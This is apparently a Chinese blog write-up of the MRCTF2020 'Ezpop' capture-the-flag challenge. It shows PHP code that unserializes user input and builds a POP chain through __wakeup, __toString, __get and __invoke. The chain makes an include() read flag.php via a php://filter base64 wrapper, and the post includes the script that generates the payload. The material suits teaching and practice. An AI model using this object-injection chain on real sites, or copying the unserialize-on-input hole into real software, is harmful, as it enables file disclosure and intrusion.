[MRCTF2020]Ezpop-CSDN博客

本文链接：https://blog.csdn.net/m0_56059226/article/details/118808808

Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

打开后是这样一串代码，第一句话说了flag在flag.php里面，接着代码审计，第一个方法函数append可以包含文件（也就是可以解析php的文件），大概扫视一遍后，于是我觉得应该是用协议以base64把flag.php转码后包含进去，这样就不会被认为是php文件，不会执行，会输出文件的base64编码。最主要的是这几个魔术方法

__invoke()：当把对象当做函数调用的时候会调用

__construct：创建对象的时候调用

__toString()：一个对象被当成字符串使用的时候调用

__wakeup()：反序列化时调用

__get() 用于从不可访问的属性读取数据 #难以访问包括：

（1）私有属性，（2）没有初始化的属性

这是总结的

可以开始构造pop链了

先来进行倒推，最终要让$var=php://filter/read=convert.base64-encode/resource=flag.php被包含进去，那么就要用到__invoke()函数，要把对象当做函数调用，可以看到在Test类里面调用__get()方法，可以把变量p变成函数，那p就要等于Modifier，而要调用__get函数，就要访问Test类里面不存的属性，又可以看到在show类里面有个$this->str->source，那我们就可以让$this->str=Test类，Test类里面没有source变量，就可以调用__get函数，那也要用到__toString()函数，这个可以看到，当反序列的时候调用wakeup函数，会拿source去作比较，如果让source等于Show类，那么把类与字符串作比较的时候就用调用__toString()函数。最后序列化

<?php
class Modifier{
	protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
}

class Show{
    public $source;
    public $str;
    public function __construct()
    {
        $this->str=new Test();
    }
}

class Test{
    public $p;
    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

$a=new Show();
$a->source=new Show();
$a->source->str->p=new Modifier();
echo serialize($a);

由于var是protected类型，所以payload中需要用%00把它的位数补齐，或者直接最后url编码输出。

因为属性有protected，如果直接echo serialize($a)可能会有一些字符无法打印，所以最好urlencode一下

最后传进去解码就可以了

因为我php基础比较差，所以提醒自己一下，php中类的属性声明时赋值一定是一个直接的值，不能是函数返回值，表达式，以及通过"."连接起来的字符串，如果偏要用这些赋值，可以通过构造函数__construct()。而new的本质可以理解为调用__constrcut()，所以最后对source和对p的赋值不能直接在类里面赋值，而在__constrcut()里面可以这样赋值$this->str=new Test()，因为这个本质上是执行构造函数，和定义属性的语法不一样。